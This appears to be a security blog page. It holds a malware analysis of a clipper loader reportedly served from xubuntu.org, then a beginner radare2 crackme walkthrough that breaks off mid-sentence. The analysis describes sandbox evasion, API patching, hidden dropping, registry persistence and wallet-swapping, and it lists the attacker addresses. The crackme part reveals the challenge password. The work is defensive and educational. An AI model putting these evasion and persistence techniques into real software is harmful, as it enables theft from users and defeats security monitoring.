Analyzing Malware distributed by Xubuntu.org

Yesterday I discovered a malware incident that was distributed via the official Xubuntu website.
There is already a Reddit post that largely corroborates the incident.



Today I’m going to take a closer look at that malware sample.
SHA256: ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.
The sample I analyzed is available on abuse.ch

(Tip for readers: always verify hashes from a trusted source before interacting with a sample.)

After downloading the sample I inspected its file metadata. This sample is not a native Win32 executable with x86 code; it is a .NET assembly. You can usually spot that with file or by looking for the CLR header (IMAGE_COR20_HEADER) in the PE.

PE32 executable for MS Windows (GUI), Intel i386 Mono/.Net assembly

Concretely: the PE contains managed CIL/IL (Intermediate Language) and only a tiny native stub whose entry point calls _CorExeMain() (from mscoree.dll) to bootstrap the CLR. That means tools like Ghidra will show only a stub at the PE entry (the real logic lives in CLR metadata streams such as #~, #Strings and #Blob) and will not produce decompiled C# by default.
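
The CLR header check can also be scripted. The following is a minimal sketch, not a replacement for file or a full PE parser: the function name has_clr_header is my own, and it only tests whether data directory entry 14 (the CLR runtime header slot in the PE/COFF specification) is non-empty, without validating anything else in the file.

```python
import struct

CLR_DIRECTORY_INDEX = 14  # data directory slot of the CLR runtime header


def has_clr_header(data: bytes) -> bool:
    """Return True if the PE image in `data` has a non-empty CLR directory."""
    try:
        if data[:2] != b"MZ":
            return False
        # e_lfanew (offset 0x3C) points to the "PE\0\0" signature.
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return False
        # The optional header follows the 4-byte signature and 20-byte COFF header.
        opt = e_lfanew + 24
        (magic,) = struct.unpack_from("<H", data, opt)
        if magic == 0x10B:      # PE32
            dirs = opt + 96
        elif magic == 0x20B:    # PE32+
            dirs = opt + 112
        else:
            return False
        # NumberOfRvaAndSizes sits directly in front of the directory array.
        (count,) = struct.unpack_from("<I", data, dirs - 4)
        if count <= CLR_DIRECTORY_INDEX:
            return False
        rva, size = struct.unpack_from("<II", data, dirs + 8 * CLR_DIRECTORY_INDEX)
        return rva != 0 and size != 0
    except struct.error:
        # Truncated input: not enough bytes for the fields we need.
        return False
```

On a real file this would be called as has_clr_header(open(path, "rb").read()); a True result means the binary belongs in ILSpy rather than in a native disassembler.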

This pattern is typical for C#-based loader/dropper families. They often present a legitimate UI (in this case “SafeDownloader”) but hide malicious actions such as:

  • anti-VM / anti-debug checks
  • writing/extracting an encrypted payload to disk
  • creating persistence via registry autostart entries

For analysis I use ILSpy to decompile the managed code. Ghidra only shows the PE boot stub; the real logic is in the managed metadata and IL.

I decompiled the sample using ILSpy (CLI) with:

~/.dotnet/tools/ilspycmd -o ./decomp_output ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.exe

Result:

ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.decompiled.cs

After decompilation we get the decompiled C# files. The code I used for analysis is available on my GitHub.

The program is a WPF GUI wrapper (SafeDownloader) that social-engineers the user by showing Ubuntu/Xubuntu ISO links. When the user clicks Generate, the app calls an internal routine (named W.UnPRslEqVw() in the decompiled code) that is the real malware routine executed in the background.


Malware behavior (detailed)


Anti-analysis & sandbox evasion.

The loader first performs anti-analysis checks:

  • Debugger detection: Debugger.IsAttached and native IsDebuggerPresent() via kernel32.
  • Virtualization detection: uses WMI (ManagementObjectSearcher) to query system manufacturer/model and looks for keywords such as VMware, VirtualBox, QEMU, Parallels, Microsoft Corporation (common in VM images).

If any probe indicates a debug/VM environment, the program calls Environment.Exit(0) and quits, preventing payload execution in sandboxes.


API patching / self-modification

Self-modification / in-memory API patching:

The code modifies bytes in loaded system libraries (e.g. kernel32.dll and ntdll.dll). One patch replaces instructions with 0xC3 (a RET) to neuter functions (for example to alter the behavior of Sleep/delay functions used by sandboxes).
Another patch writes attacker-supplied bytes (XOR-decrypted) into memory.

This is effectively inline hooking / API patching and can alter the behavior of timing/registry functions or attempt to disable runtime hooks that monitoring software or AV products use.


Dropper

The loader drops a second-stage executable:

CreateDirectoryNative(text2);
WriteFileNative(text3, data);
MoveFileNative(text3, text4);
SetAttributesNative(..., attributes);
  • creates a folder under %APPDATA% (via Environment.SpecialFolder.ApplicationData),
  • writes a Base64-encoded blob (then XOR-decoded with key 0xF7) into a .tmp file,
  • renames the .tmp to .exe, and sets file attributes (hidden/system) via native calls.

These helpers correspond to CreateDirectory, CreateFile/WriteFile, MoveFile, and attribute-setting wrappers in the code.


Registry persistence

SetRegistryPersistence(text4, regPath);

The sample writes an autostart entry into the registry using low-level APIs (NtSetValueKey from ntdll and RegOpenKeyEx from advapi32) to store a randomly generated value name with the path to the dropped EXE. Because it writes directly via native system calls (instead of higher-level wrappers), this may be an attempt to confuse or bypass some detection mechanisms that watch common API usage.


Execution & single-instance check

Before launching the dropped executable the loader checks whether a process with the same name is already running. If it is not, the loader starts the dropped binary. This avoids multiple simultaneous instances.


UI deception

The WPF UI displays legitimate Ubuntu download links to build trust. The user sees nothing suspicious while the loader writes the payload to disk, establishes persistence, and executes the dropped binary in the background.


Extracting and decoding the dropped payload

As we can see here, there is another Base64-encoded and XOR-obfuscated payload (XOR key = 247 / 0xF7) stored in the variable data:

I exported the Base64 blob to dropper_isolated.b64 and decoded + XOR-decoded it with:

python3 -c 'import base64; import sys; data = base64.b64decode(open("dropper_isolated.b64").read()); data = bytes([b ^ 0xF7 for b in data]); open("payload.bin","wb").write(data)'

The result, payload.bin, is a new native PE executable (x86 machine code), not a .NET assembly.
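
For repeated use, the one-liner can be unrolled into a small script. This is a sketch under the same assumptions as above (Base64 first, then a single-byte XOR with 0xF7); the helper names decode_payload and looks_like_pe are mine, and the MZ check is only a quick sanity test, not a full PE validation.

```python
import base64


def decode_payload(b64_text: str, key: int = 0xF7) -> bytes:
    """Base64-decode the blob, then XOR every byte with the single-byte key."""
    raw = base64.b64decode(b64_text)
    return bytes(b ^ key for b in raw)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: a decoded PE file must start with the MZ signature."""
    return data[:2] == b"MZ"
```

If looks_like_pe returns False for the decoded data, the key or the exported blob is most likely wrong, which is worth knowing before the file goes to VirusTotal or Ghidra.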

I uploaded that binary to VirusTotal for a quick scan:

VirusTotal flags the payload as malicious and indicates that it is a cryptocurrency clipper, malware that monitors the Windows clipboard for crypto wallet addresses and replaces them with attacker-owned addresses so funds are redirected to the attacker’s wallet. With this classification we can pivot to a deeper static analysis (I used Ghidra for the native PE).

The native binary is small and relatively easy to analyze:

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData), a strong indicator of clipper behavior.
I navigated to the function that implements these calls (named FUN_1400016b0 in my Ghidra session).


Clipboard routine overview.
The function reads the Windows clipboard:

  • opens the clipboard and calls GetClipboardData(CF_TEXT),
  • validates that the clipboard bytes are text and contain only characters typical for wallet addresses (alphanumeric, : or _)
  • then performs prefix checks to identify the coin type.

Prefix checks & coin type mapping.
The malware performs a series of prefix checks to detect the wallet type. From the decompiled logic the mapping is:

Bitcoin:
(*pcVar4 - 0x31U & 0xfd) == 0 or strncmp(pcVar4, &DAT_140004034, 3) → 1 / 3...

Litecoin:
strncmp(pcVar4, &DAT_14000402c, 4) or (*pcVar4 + 0xb4U) < 2

ETH:
strncmp(pcVar4, &DAT_140004028, 2) → "0x"

DOGE:
cVar1 == 'D'

TRON:
cVar1 == 'T'

XRP:
cVar1 == 'r'
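
The two arithmetic checks in the Bitcoin and Litecoin branches are less obvious than the plain character comparisons, so here is a small sketch that brute-forces which first characters satisfy them. One assumption is labeled in the code: I treat the Litecoin expression as 8-bit arithmetic (the addition wraps at 256), which is how such range checks usually compile; the decompiler output above does not show the cast explicitly.

```python
def matching_chars(predicate):
    """Return every single-byte character for which the check is true."""
    return [chr(c) for c in range(256) if predicate(c)]


# (*pcVar4 - 0x31U & 0xfd) == 0
# Masking with 0xfd ignores bit 1, so the difference may be 0 or 2.
btc_first_chars = matching_chars(lambda c: ((c - 0x31) & 0xFD) == 0)

# (*pcVar4 + 0xb4U) < 2
# ASSUMPTION: evaluated as an 8-bit value, so the sum wraps around at 256.
ltc_first_chars = matching_chars(lambda c: ((c + 0xB4) & 0xFF) < 2)

print("Bitcoin branch accepts:", btc_first_chars)
print("Litecoin branch accepts:", ltc_first_chars)
```

Under that assumption the first check accepts the characters 1 and 3, and the second accepts L and M, which fits the usual leading characters of legacy Bitcoin and Litecoin addresses.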

Where to find the addresses:

For each coin type the malware assembles the attacker’s address from two parts:

  • several 32-bit constants (_DAT_140004100, _DAT_140004104, …)
    eight 4-byte words = 32 ASCII characters (little-endian dword representation)
  • a short tail derived by XOR-ing bytes taken from another data blob (e.g. DAT_1400031c0) with 0x15
    The tail length varies (commonly 2–10 bytes depending on coin), and it completes the address (including checksum)


You can verify a single dword with Python:

python3 -c "import struct; print(struct.pack('<I', 0x71316362).decode('ascii'))"

The result:

bc1q

So the first dword decodes to bc1q, the signature prefix of a Bech32 Bitcoin address.

This is how I build the tail by merging the byte chunks:

The 32-character string obtained from the dwords is only the first part. The function then computes additional tail bytes by XOR-ing bytes from a separate data region (e.g. DAT_1400031c0) with 0x15 and appends them.
Those tail bytes complete the address (including checksum).
If you only decode the dwords, the address will fail checksum validation. You must XOR-decode and append the tail bytes to get a valid address.
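
To check whether a reconstructed bc1q address is complete, the Bech32 checksum can be verified offline. The sketch below follows the checksum definition from BIP-173 (character set, generator constants, final value 1); the function name bech32_checksum_ok is my own, and the check covers only the checksum, not the witness program length or version.

```python
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)


def _polymod(values):
    """BCH checksum over 5-bit values as defined in BIP-173."""
    chk = 1
    for value in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ value
        for i, gen in enumerate(GENERATOR):
            if (top >> i) & 1:
                chk ^= gen
    return chk


def bech32_checksum_ok(address: str) -> bool:
    """Return True if `address` carries a valid Bech32 (BIP-173) checksum."""
    if address != address.lower() and address != address.upper():
        return False  # mixed case is not allowed
    address = address.lower()
    hrp, sep, data = address.rpartition("1")
    if not sep or not hrp or len(data) < 6:
        return False
    if any(c not in CHARSET for c in data):
        return False
    expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    return _polymod(expanded + [CHARSET.index(c) for c in data]) == 1
```

Running a reconstructed address through bech32_checksum_ok is a quick way to notice a missing or wrongly decoded tail before the address is published as an IoC.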


Full address assembly (summary)
The malware writes eight 32-bit constants (32 ASCII chars) and then fills a small tail array with bytes computed as DAT_src[i] ^ 0x15 (tail length varies). The full address is dword_ascii + xor_tail.
It then GlobalAllocs a clipboard buffer and calls SetClipboardData(CF_TEXT, ...) to replace the clipboard contents.



To recover the tail bytes:

dump the bytes at the VA (e.g. 0x1400031c0) with a binary tool (I used radare2; you can also use Ghidra or xxd), for example:

76 78 25 2D 60 64 7D 23 25 63 

XOR each raw byte with 0x15 (the deobfuscation key embedded in the code). You can do this in CyberChef: From Hex -> XOR (key: 15 hex) -> To String.

Output:

cm08uqh60v

Appending that to the 32-char dword string yields the full Bech32 address:

bc1qrzh7d0yy8c3arqxc23twkjujxxax + cm08uqh60v = bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v
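
The same reconstruction can be done in Python instead of CyberChef. This is a sketch using only the values shown above: the raw tail bytes, the key 0x15 and the 32-character head. Note that the eight dwords are re-derived here from the head string for illustration, they are not copied from the Ghidra listing; the helper names are mine.

```python
import struct

HEAD = "bc1qrzh7d0yy8c3arqxc23twkjujxxax"  # 32 chars recovered from the dwords
RAW_TAIL = bytes.fromhex("76 78 25 2D 60 64 7D 23 25 63")  # bytes at the tail blob
XOR_KEY = 0x15


def decode_dwords(dwords) -> str:
    """Turn little-endian 32-bit constants back into their ASCII text."""
    return b"".join(struct.pack("<I", d) for d in dwords).decode("ascii")


def decode_tail(raw: bytes, key: int = XOR_KEY) -> str:
    """XOR every tail byte with the single-byte key."""
    return bytes(b ^ key for b in raw).decode("ascii")


# Re-derive the eight dwords from the head string (illustration only).
dwords = struct.unpack("<8I", HEAD.encode("ascii"))
address = decode_dwords(dwords) + decode_tail(RAW_TAIL)

print(hex(dwords[0]))
print(address)
```

The first dword printed is the 0x71316362 constant from the earlier one-liner, and the assembled string is the full address shown above.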

Extracted addresses:
I applied the same method to other coin branches and extracted the following attacker addresses from the binary:

  • Bitcoin (Bech32): bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v
  • Litecoin: LQ4B4aJqUH92BgtDseWxiCRn45Q8eHzTkH
  • Ethereum / BSC style (hex): 0x10A8B2e2790879FFCdE514DdE615b4732312252D
  • Dogecoin: DQzrwvUJTXBxAbYiynzACLntrY4i9mMs7D
  • Tron (TRX): TW93HYbyptRYsXj1rkHWyVUpps2anK12hg
  • XRP (Ripple): r9vQFVwRxSkpFavwA9HefPFkWaWBQxy4pU
  • Cardano: addr1q9atfml5cew4hx0z09xu7mj7fazv445z4xyr5gtqh6c9p4r6knhlf3jatwv7y72deah9un6yettg92vg8gskp04s2r2qren6tw

These are the final wallet addresses embedded in this sample (per the static reconstruction). I didn’t find any additional interesting functionality in the binary beyond the dropper/clipper behavior.


TL;DR

I found a C# WPF loader distributed via an Xubuntu download page that drops a native clipper payload.
The loader includes anti-VM and anti-debug checks, in-memory API patching, drops and runs a second-stage PE, and the second stage is a clipboard clipper that replaces wallet addresses with attacker-owned addresses.
I statically reconstructed the attacker wallets from embedded dwords + XOR tails and found several addresses for BTC, LTC, ETH, DOGE, TRX, XRP and Cardano. No transactions were observed at the time of analysis.


A short critique: why the threat actor did a surprisingly poor job despite compromising xubuntu.org

It’s striking how many basic operational security and quality of work mistakes this actor made, mistakes that turned what could have been a high-impact supply-chain compromise into a relatively easy forensic win for analysts.

Concrete failures observed

  • Amateur packaging: shipping a ZIP that claims to contain a torrent but actually contains an .exe and a tos.txt is a glaring red flag. That mismatched user experience (and the presence of an executable in a “torrent” download) makes the payload obvious to even casual users and automated scanners.
  • Sloppy metadata: the tos.txt claims “© 2026 Xubuntu.org” while it’s 2025. Small details like anachronistic timestamps or incorrect copyright years are low-effort giveaways that something is off.
  • Poor obfuscation / easy static recovery: the attacker embedded wallet strings as readable dwords plus simple XOR tails. Those artifacts were trivially reconstructable with basic tooling (radare2/CyberChef/Python). Even the XOR keys were visible in the decompiled code. That means the malicious addresses, the primary goal of the clipper, were recoverable without dynamic execution.
  • Malformed or inconsistent artifacts: some extracted addresses failed checksum validation (or appeared intentionally malformed). That suggests rushed assembly, faulty encoding, or placeholders left in, again lowering the bar for detection and denying the attacker guaranteed success.
  • Over-reliance on a single trick: using a compromised site to host a ZIP is effective in general, but the actor did not sufficiently hide operational traces nor build fallback delivery strategies. When defenders inspected the file, the entire chain unraveled quickly.

Why these mistakes matter

  • They reduced the attacker’s window of opportunity. Instead of a stealthy supply-chain drop that could reap long-lived infections, the compromise was noisy and trivially triaged.
  • They made attribution and indicator extraction easy: embedded addresses, simple XOR keys, and clear code paths gave analysts immediate IoCs (wallets, hashes, strings).
  • They increased the chances of swift remediation by the vendor and faster takedown by infrastructure providers.

Final thought
The actor clearly reached a valuable target, the official download infrastructure, but their execution quality was low. That combination (high opportunity + poor tradecraft) is exactly what defenders want: an incident with high signal and relatively low analytical cost. The silver lining here is that sloppy attackers give security teams the evidence they need to respond quickly and to harden distribution chains for the future.

Crackme – RodrigoTeixeira’s Very easy disassembly exercise


Since I want to dive deeper into reverse engineering, I’ve decided to regularly solve CrackMe challenges from https://crackmes.one; I’ll begin with low-difficulty ones and gradually work my way up to harder challenges.

I chose this approach because it’s a practical way to build and demonstrate the fundamentals. Reverse engineering can be overwhelming at first, so starting with simpler tasks helps establish a reliable foundation.

Today’s CrackMe is by Rodrigo Teixeira and is rated 1.1 in difficulty; you can find it here: https://crackmes.one/crackme/68a346c48fac2855fe6fb6df.

Because this is a fairly simple exercise, I’ll analyze it with radare2 instead of Ghidra, partly to avoid making the task trivial, and I’ll concentrate on how to translate assembly into readable pseudo-C code step by step.
I recommend gaining a basic understanding of Assembly and the C programming language before diving in. I’ll keep this write-up as beginner-friendly as possible and have included links to resources that explain any terminology that might be unfamiliar to newcomers. If you have any questions, feel free to contact me.

If you want to dive deeper into radare2 commands, I recommend reading its official documentation or the following cheatsheet.
Here is a list of references for research used in this WriteUp:

– General Reverse Engineering & x86 Assembly

Intel® 64 and IA-32 Architectures Software Developer’s Manuals
https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html
x86 Instruction Reference
https://wiki.osdev.org/X86-64
PC Assembly Language by Paul A. Carter
https://pacman128.github.io/static/pcasm-book.pdf

– Windows Internals & PE File Format

Microsoft PE/COFF Specification
https://learn.microsoft.com/en-us/windows/win32/debug/pe-format

– radare2

radare2 Book (official)
https://book.rada.re
r2wiki Cheat Sheet
https://r2wiki.readthedocs.io/en/latest/home/misc/cheatsheet/

– Calling Conventions & ABI

System V i386 ABI
https://refspecs.linuxfoundation.org/elf/abi386-4.pdf
Microsoft x64 Calling Convention
https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention

– Beginner-Friendly Practical Resources

Crackmes.one Platform
https://crackmes.one
0x00sec Reverse Engineering Category
https://0x00sec.org/c/reverse-engineering/
OpenSecurityTraining: Intro to x86
https://p.ost2.fyi/courses/course-v1:OpenSecurityTraining2+Arch1001_x86-64_Asm+2021_v1/about

After downloading the binary, the first thing I’ll do is launch radare2 with the -A option to run an automatic analysis pass.

Once radare2 has loaded the binary, you can type i to display detailed information about the loaded executable.

The binary is a Windows Portable Executable (PE) file. A Portable Executable file is a format used for executable and object files in Windows operating systems, based on the Common Object File Format (COFF). It’s used for files such as .exe, .dll, .sys, and others. The structure begins with a 64-byte MS-DOS header starting with the characters “MZ” (0x5A4D) and includes an offset field (e_lfanew) that points to the actual PE header.
In PE files, it’s important to distinguish between file offsets (positions in the raw file) and virtual addresses (VA), which are used once the file is loaded into memory.
In radare2, s 0 moves to the file offset 0x0, while s baddr jumps to the binary’s base virtual address (usually 0x00400000 for Windows executables).

You can inspect the e_lfanew field with:

pv4 @ 0x3c

This gives the offset to the PE header.
If the result is 0xffffffff, it typically means the memory region isn’t mapped or is filled with placeholder bytes (0xFF).

We can also verify this by entering the following command:

s 0
# Shows the MS-DOS header ("MZ ...")
px 64 @ 0 

As expected, you can see the “MZ” signature (bytes 4D 5A, which read as the little-endian 16-bit value 0x5A4D) at the beginning of the header.
PE files (like all Windows binaries) use little-endian byte order, meaning the least significant byte comes first.
In radare2:

px 4 @ 0x3c    # shows raw bytes (in little-endian order)
pv4 @ 0x3c     # interprets those 4 bytes as a 32-bit integer

You can also use pf to parse structured data, for example:

pf 2s e_magic; 58x; 4u e_lfanew @ 0

This reads the e_magic signature and the e_lfanew offset in one step, making PE header inspection much clearer.
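
If you want to double-check what radare2 prints, the same two fields can be read with a few lines of Python. This is only a sketch: read_dos_header is a name I made up, and it looks at nothing but e_magic (offset 0) and e_lfanew (offset 0x3C) of the 64-byte MS-DOS header.

```python
import struct


def read_dos_header(data: bytes):
    """Return (e_magic, e_lfanew) from the first 64 bytes of a PE file."""
    if len(data) < 0x40:
        raise ValueError("need at least the 64-byte MS-DOS header")
    # "<H" = little-endian 16-bit, "<I" = little-endian 32-bit.
    (e_magic,) = struct.unpack_from("<H", data, 0)
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_magic, e_lfanew
```

For a valid PE file, e_magic comes back as 0x5A4D (the bytes 4D 5A read in little-endian order), and e_lfanew should match the value that pv4 @ 0x3c reports.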


Now I’ll run afl to list the functions that radare2 discovered in this binary.
The list is extensive, but we’re specifically looking for the entry function where the executable begins execution.

The entry function is located at 0x00401a00; radare2 has already taken us there automatically, but you can jump to it manually with s 0x00401a00.

Using afl~main we can list all functions whose names include “main.”

To display the assembly code for this function, I can use the command pdf @ sym._main.

Now we can translate the given assembly into pseudocode to better visualize what the function is doing.
I’ll start by deriving the function signature (parameters and return type). Here’s the general approach:

Identify the calling convention

  • In the epilogue:
    • ret -> cdecl (the caller cleans up the arguments)
    • ret N -> stdcall (the callee cleans up N bytes = number of arguments × 4)
  • Register-based conventions:
    • thiscall (MSVC): ecx holds this
    • fastcall: the first arguments are passed in ecx and edx

Count the number of arguments

  • For stdcall: the number of arguments = imm in ret imm / 4
  • For cdecl:
    • Count the push instructions (or mov [esp+…]) before the call in the caller function
    • Example: three push instructions -> three arguments
  • If the callee references its arguments directly:
    • [ebp+8] -> first argument
    • [ebp+0xC] -> second argument, and so on.

Determine the return type
Check the final instructions in the function body:

  • Used as an address -> pointer
  • Value returned in eax (32-bit) -> int, bool, or pointer
  • Value returned in edx:eax -> 64-bit integer
  • Value returned via st0 (FPU) -> float or double (common with fld/fstp)
  • (SSE returns on x86-32 are rare; on x64 they use xmm0.)

Consider semantics:

  • Only 0 or 1 -> likely bool
  • Multiple values or error codes -> int

Now, for our specific case:

Since the callee doesn’t use any parameters in its data flow, we move to its caller (the CRT startup routine).
In PE/MinGW, the startup sequence typically goes like this:
mainCRTStartup -> __tmainCRTStartup -> ___main or __mingw32_init_mainargs -> _main(argc, argv, envp)

Identifying CRT vs. User Code:

When analyzing Windows executables, you’ll often see functions like ___main, mainCRTStartup, or __tmainCRTStartup.
These belong to the C Runtime (CRT) and handle setup tasks such as initializing global variables, the floating-point environment, and calling your actual main function.
A quick rule of thumb: if the function name starts with multiple underscores or manipulates environment or FPU state (fldenv, fninit, ldmxcsr), it’s part of the CRT, not user-written code.

We can now inspect the call sites in radare2.
Looking at the initial disassembly output, we can identify the relevant line:

; CALL XREF from fcn.004011b0 @ 0x401283(x)

This shows the address of the call site.
We can jump to that address and review the instructions leading up to the call with:

s 0x401283
pd -30
pd 20

Here we can see the typical behavior of the C runtime (CRT), which retrieves the arguments from global variables and passes them to main using a push-less call convention.

Push-less Call Convention? What is that?

Some compilers (like GCC or MinGW) don’t use the traditional push instructions for function arguments.
Instead, they write the argument directly onto the stack with mov [esp], value and then call the function.
When the call instruction executes, it automatically pushes the return address, so from the callee’s point of view the argument sits at [esp+4], exactly where it expects it according to the cdecl calling convention.

Example:

mov [esp], 0x405064   ; write argument (string address)
call printf            ; CPU pushes return address -> arg at [esp+4]

This technique saves instructions and is known as a push-less call setup.
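
To make the offsets concrete, here is a tiny Python model of the stack around such a call. It is a toy sketch, not an emulator: the function name and the starting esp value are invented, and the return address 0x40147a is simply the address of the instruction that follows the first printf call later in this write-up.

```python
def simulate_pushless_call(arg: int, return_address: int, esp: int = 0x0061FF00):
    """Model `mov dword [esp], arg` followed by `call` on a 32-bit stack."""
    memory = {}
    # Caller: write the argument into the slot esp currently points to.
    memory[esp] = arg
    # call: push the return address, which moves esp down by 4 bytes.
    esp -= 4
    memory[esp] = return_address
    return esp, memory


esp, memory = simulate_pushless_call(0x405064, 0x40147A)
print(hex(memory[esp]))      # what the callee sees at [esp]
print(hex(memory[esp + 4]))  # what the callee sees at [esp+4]
```

At function entry the callee finds the return address at [esp] and the argument at [esp+4], the same layout it would see after a classic push.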

0x00401267  e8 8c28....    call ___p__environ
0x0040126c  8b 00           mov  eax, dword [eax]
0x0040126e  89 44 24 08     mov  [var_8h], eax

Here’s a brief explanation of the assembly code:
___p__environ() returns a pointer to the global variable environ, so the returned value is of type char***.
mov eax, [eax] dereferences it once, so eax now holds a char**, the actual envp pointer.
This value is then stored in var_8h, effectively setting envp = environ;.

0x00401272  a1 00 70 40 00  mov  eax, [0x407000]
0x00401277  89 44 24 04     mov  [var_4h], eax

[0x407000] is a CRT global variable. Its value is stored in var_4h, i.e. [esp+4], which is the second argument slot under cdecl.
Since the startup code calls _main(argc, argv, envp), this global most likely holds __argv, effectively making it argv = __argv;.

0x0040127b  a1 04 70 40 00  mov  eax, [0x407004]
0x00401280  89 04 24        mov  [esp], eax      ; char **argv

[0x407004] is the neighbouring CRT global. mov [esp], eax writes its value to the top of the stack without using a push instruction. [esp] is the first argument slot, so despite radare2’s char **argv annotation this value is most likely __argc.
This is a common compiler pattern known as a “push-less call setup”; after these three stores, all parameters are prepared for the upcoming function call.

0x00401283  e8 d8 01 00 00  call sym._main      ; int main(char **argv)

The call uses whatever is currently stored at [esp], [esp+4], and [esp+8].
radare2 annotates the function signature as int main(char **argv), showing only a single parameter. The CRT actually passes three values, but main never reads any of them, so I keep radare2’s signature for the pseudocode.

Now that we understand how the parameter passing works, we can start writing our first pseudocode.

<RETURN-TYPE> main(char **argv) {}

We still need to determine the return type for the function signature, which should be relatively easy to identify. To do this, I’ll take a look at the final instructions of our assembly function.

│       └─> 0x004014a5      b800000000     mov eax, 0 
│           0x004014aa      c9             leave
└           0x004014ab      c3             ret

mov eax, 0 gives us a clear indication of the return type: the register that is written right before the leave and ret sequence tells us how the result is returned.
In 32-bit code, integer and pointer return values are stored in the EAX register.
This follows the ABI (Application Binary Interface) convention and holds for all common x86 calling conventions, such as cdecl, stdcall, fastcall, and thiscall.

Calling Conventions? What is that?

Understanding the calling convention is essential when reconstructing a function’s signature.
You can often identify it by looking at how the stack is cleaned up and how arguments are passed:

Convention | Stack Cleanup | Argument Passing | Typical Pattern
cdecl | Caller | via stack (push / mov [esp+..]) | ret
stdcall | Callee | via stack | ret N (N = args × 4)
fastcall | Callee | first args in ecx, edx | ret N
thiscall | Callee | ecx = this (C++) | ret N

If the callee doesn’t access any arguments directly, inspect the call site instead — count how many push or mov [esp+..] instructions occur before the call. That number tells you how many parameters are passed.

Return type (in C) | Register | Size
int, bool, pointer | EAX | 4 bytes
float | ST0 (FPU) | 4 bytes
double | ST0 (FPU) | 8 bytes
long long | EDX:EAX | 8 bytes (combined)

We can therefore confidently conclude that the return value is an integer, allowing us to expand our pseudocode accordingly.

int main(char **argv) {}

Now we can finally focus on analyzing the data flow and translating it step by step.

The prologue of the function can be ignored when writing our pseudocode. It is responsible for setting up the stack frame, aligning the stack to 16 bytes, reserving local variables, and initializing the C runtime (CRT).

Stack frame? What is that?

At the beginning of a function, the compiler sets up what’s called a stack frame.
sub esp, 0x20 reserves 32 bytes (0x20) on the stack for local variables.
Each local variable is located at a specific offset relative to either esp or ebp.

Example (as seen by a callee on entry, right after the call):

esp+0x00 → return address
esp+0x04 → first function argument

Inside main, after sub esp, 0x20, the local variable var_1ch lives at esp+0x1C.

So, lea eax, [var_1ch] loads the address of that local variable into eax, not its value.

At the end of the function, the leave instruction restores the previous stack frame, and ret pops the return address to resume execution at the caller.

55                    push ebp
89 e5                 mov ebp, esp
83 e4 f0              and esp, 0xfffffff0      ; 16-byte alignment
83 ec 20              sub esp, 0x20            ; reserve 32 bytes for local variables
e8 72 05 00 00        call ___main             ; CRT/MinGW init

After the prologue, the stack frame of main is laid out as follows:

esp+00  <- first argument slot for outgoing calls; the compiler stores the first function argument here (push-less)
esp+04  <- second argument slot
...
esp+1C  <- local int  (radare: var_1ch)

The first section of code that we can meaningfully translate begins at address 0x0040146e:

0x0040146e      c704246450..   mov dword [esp], str.Enter_password__int_: ; [0x405064:4]=0x65746e45 ; "Enter password (int): " ; const char *format
0x00401475      e80e260000     call sym._printf            ; int printf(const char *format)

At address 0x0040146e, the instruction writes the 32-bit value 0x405064 (the address of the C string constant "Enter password (int): ", stored in the .rdata section) to the top of the stack ([esp]).
This represents a push-less argument setup: instead of using push imm32, the compiler writes the first function argument directly into the stack slot. This pattern is typical for GCC and MinGW.

Immediately afterward, the function printf is called to print the string. During the call, the CPU automatically pushes the return address onto the stack, which decreases esp by 4 bytes.

We can now extend our pseudocode as follows:

int main(char **argv) {
    printf("Enter password (int): ");
}

Now let’s examine the next four lines:

0x0040147a      8d44241c       lea eax, [var_1ch]
0x0040147e      89442404       mov dword [var_4h], eax
0x00401482      c704247b50..   mov dword [esp], 0x40507b   ; '{P@'
                                                           ; [0x40507b:4]=0x59006425 ; "%d" ; const char *format
0x00401489      e8ea250000     call sym._scanf      ; int scanf(const char *format)

At address 0x0040147a, we can see that the function’s stack frame contains a local variable at offset 0x1C. var_1ch is radare2’s symbolic name for the stack slot at [esp+0x1c] (i.e., a local 0x1C bytes into the 0x20-byte frame reserved by sub esp, 0x20).

This variable is not initialized and, as we can see in the final instruction of this block, it is used as the destination for the scanf call to store the user input.

We can incorporate this information directly into our pseudocode:

int main(char **argv) {
    printf("Enter password (int): ");
    int input;
    scanf("%d", &input);
}

Our code is slowly starting to take shape and gain some structure, so let’s move on and analyze the remaining instructions:

│           0x00401492      3d90e70100     cmp eax, 0x1e790
│       ┌─< 0x00401497      750c           jne 0x4014a5
│       │   0x00401499      c704247e50..   mov dword [esp], str.You_got_it___ ; [0x40507e:4]=0x20756f59 ; "You got it ;)" ; const char *format
│       │   0x004014a0      e8e3250000     call sym._printf            ; int printf(const char *format)
...
│       └─> 0x004014a5      b800000000     mov eax, 0
│           0x004014aa      c9             leave
└           0x004014ab      c3             ret
            0x004014ac      6690           nop

cmp eax, 0x1e790 compares the value in EAX (previously loaded from [var_1ch], i.e. the user input) with the 32-bit constant 0x0001E790 (decimal 124816). This constant is the key to our CrackMe challenge: it is effectively the flag. As a result of the comparison, the CPU updates the status flags (including the Zero Flag, ZF).

Translating Comparisons and Flags into if Statements

The cmp instruction sets CPU status flags based on the result of a subtraction (A - B), and conditional jumps like je, jne, or jg use those flags to control flow.

Instruction | Condition (Flag) | High-Level Equivalent
je / jz | ZF = 1 | if (A == B)
jne / jnz | ZF = 0 | if (A != B)
jg / jnle | ZF = 0 & SF = OF | if (A > B)
jl / jnge | SF ≠ OF | if (A < B)

Example:

cmp eax, 0x1e790
jne 0x4014a5

translates to

if (input != 124816) goto 0x4014a5;

Tip: You can quickly convert hexadecimal to decimal in radare2 with

